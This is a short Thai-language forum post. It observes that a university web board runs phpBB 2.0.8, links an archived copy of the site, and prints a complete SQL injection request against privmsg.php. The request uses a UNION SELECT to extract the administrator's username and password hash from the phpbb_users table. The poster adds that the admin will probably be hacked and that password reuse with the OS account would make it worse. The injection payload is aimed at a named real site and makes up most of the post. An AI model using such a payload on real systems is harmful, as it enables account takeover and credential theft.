เป็นเว็บบอร์ดจริงๆด้วย Powered by phpBB 2.0.8
http://web.archive.org/web/20050306075734/....eng.dpu.ac.th/
ช่องโหว่ของ Version นี้คือ
Code:
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION
SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password
FROM phpbb_users WHERE user_id=2 LIMIT 1/*
เท่าที่ดูจาก Code แล้วคือ MySQL Injection สงสัย user Admin จะโดน Hack แน่เลย แล้วถ้าโชคร้ายกว่านั้นถ้าใช้รหัส Admin เดียวกันกับ user ของ OS ก็จบ ....